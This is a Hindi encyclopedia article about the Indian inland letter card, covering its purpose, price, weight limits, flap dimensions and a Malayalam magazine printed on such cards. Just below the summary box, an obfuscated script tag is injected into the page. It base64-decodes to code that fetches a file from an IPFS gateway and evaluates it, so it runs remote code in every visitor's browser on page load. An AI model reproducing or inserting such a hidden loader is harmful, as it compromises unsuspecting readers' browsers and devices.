अंतर्देशीय पत्र कार्ड

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
The printable version is no longer supported and may have rendering errors. Please update your browser bookmarks and please use the default browser print function instead.
अंतर्देशीय पत्र कार्ड
अंतर्देशीय पत्र कार्ड
विवरण तकनीकी तौर पर अंतर्देशीय पत्र कार्ड एक नि‍श्‍चि‍त आकार के काग़ज़ पर लि‍खा संदेश होता है, जि‍से मोड़कर बंद कि‍या जाता है।
मूल्य यह प्रति कार्ड 2.50 रुपये पर उपलब्ध रहता है।
वज़न निजी तौर पर मुद्रित पत्र कार्ड का वज़न 4 ग्राम से अधिक नहीं होना चाहिए।
अन्य जानकारी इसके भीतर कोई भी काग़ज़ या सामान रखने की अनुमति नहीं दी जाती है।

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

अंतर्देशीय पत्र कार्ड (अंग्रेज़ी:Inland Letter Card) पोस्‍ट कार्ड से अलग होता है। इसमें संदेश खुले में नहीं लि‍खा जाता। संदेश को पढ़ने के लि‍ए इसके फ्लैप को खोलना पड़ता है, जबकि पोस्‍ट कार्ड के मामले में, जि‍सके हाथ से भी पोस्‍ट कार्ड गुजरे, वह संदेश पढ़ सकता है। तकनीकी तौर पर अंतर्देशीय पत्र कार्ड एक नि‍श्‍चि‍त आकार के काग़ज पर लि‍खा संदेश होता है, जि‍से मोड़कर बंद कि‍या जाता है। अंतर्देशीय पत्र कार्ड भारत के अंदर ही प्रेषण के लि‍ए होता है। वि‍देशों में संदेश भेजने के लि‍ए अधि‍क लागत का वि‍शेष अंतर्देशीय पत्र कार्ड, जि‍से एरोग्राम कहा जाता है, इस्‍तेमाल कि‍या जाता है।

मलयालम पत्रि‍का

मलयालम की पत्रि‍का इन्‍नू पूरी तरह से इस तरह के अंतर्दशीय पत्र कार्ड पर छपती है। इसमें कवि‍ताएं, संपादकीय, कार्टूंन, संपादक को पत्र सभी कुछ होता है, जो पूरे आकार की पत्रि‍का में होते हैं, लेकि‍न बहुत ही छोटे आकार में छपते हैं। [1]अंतर्देशीय पत्र कार्ड: संचार निर्धारित आकार और तह के साथ कागज के एक पत्रक पर निहित है। अंतर्देशीय पत्र कार्ड केवल भारत में ही संचरण के लिए प्रयोग किया जाता है। इसका अधिकतम वज़न 5 ग्राम होता है।

इस प्रकार के रूप में सामने आया (बिना मुड़ा हुआ) और मुड़ा हुआ‌ अपने फ्लैप सहित पत्र कार्ड के आयाम क्रमश होंगे
बिना मुड़ा हुआ मुड़ा हुआ
अधिकतम 30 सेमी x 21 सेमी अधिकतम 21 सेमी x 10 सेमी
न्यूनतम 28.2 सेमी x 18.2 सेमी न्यूनतम 15.2 सेमी x 9 सेमी
फ्लैप पत्र कार्ड के तीन फ्लैप होने चाहिये, जिसमें ऊपर का फ्लैप 21 सेमी चौड़ाई और 1.5 सेमी ऊँचाई का हो और दायीं एवं बायीं ओर वाले फ्लैप में 10 सेमी चौड़ाई, 1.5 सेमी से अधिक गहराई नहीं होनी चाहिये। यदि किसी अन्य तरीक़े से अंतर्देशीय पत्र कार्ड को बंद किया जा सके तो फ्लैप की कोई आवश्यकता नहीं है। अंतर्देशीय पत्र कार्ड के लिए न्यूनतम पेपर 70 जीएसएम (70 GSM)

विशेषताएँ

एक पत्र कार्ड आमतौर पर लिखे पत्र को उपयुक्त रूप से मोड़ कर (फ़ोल्डर) और गोंद द्वारा चिपका कर इस्तेमाल किया जाने वाला एक पत्र है जो डाकखाने से ख़रीदा जा सकता है। यह उचित मूल्य पर उपलब्ध है। इसका मूल्य कम ही होता है और आम जनता के लिए सस्ता व सुलभ माध्यम है। इसके भीतर कोई भी काग़ज़ या सामान रखने की अनुमति नहीं दी जाती है। यह व्यापक प्रचार और प्रसार में है और यह मुफ़्त ही हवाई संचरण द्वारा देश के भीतर ही प्रयोग किया जा सकता है। यह प्रति कार्ड 2.50 रुपये पर उपलब्ध रहता है। निजी तौर पर मुद्रित पत्र कार्ड का वज़न 4 ग्राम से अधिक नहीं होना चाहिए। पते के शीर्ष बाएँ हाथ कोने में शब्द "अंतर्देशीय पत्र कार्ड" लिखा होना चाहिए और पत्र कार्ड की नाप निम्नलिखित सीमा के भीतर होना चाहिए।



पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. सादा पोस्‍ट कार्ड : आम आदमी का संदेश वाहक। । अभिगमन तिथि: 29 दिसम्बर, 2013।

बाहरी कड़ियाँ

संबंधित लेख